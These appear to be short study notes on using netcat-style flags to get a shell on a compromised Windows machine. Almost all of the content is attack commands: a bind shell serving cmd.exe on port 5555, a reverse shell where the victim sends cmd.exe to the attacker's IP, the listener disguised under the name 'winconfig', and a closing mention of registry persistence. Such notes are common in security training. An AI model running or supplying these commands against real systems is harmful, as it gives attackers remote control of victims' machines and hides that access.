-l
listen
-e
execute
-p
port
-v
verbose
on the windows terminal
> winconfig -l -p 5555 -e cmd.exe
on attack machine
$ ncat <windows exploited machine> <port listening on>
→ switch the roles of attacker and victim
attacker (server)
$ ncat -l -p 5555 -v
victim (client)
> winconfig -e cmd.exe <attacker ip> <port listening on>
by adding the necessary command key to the network registry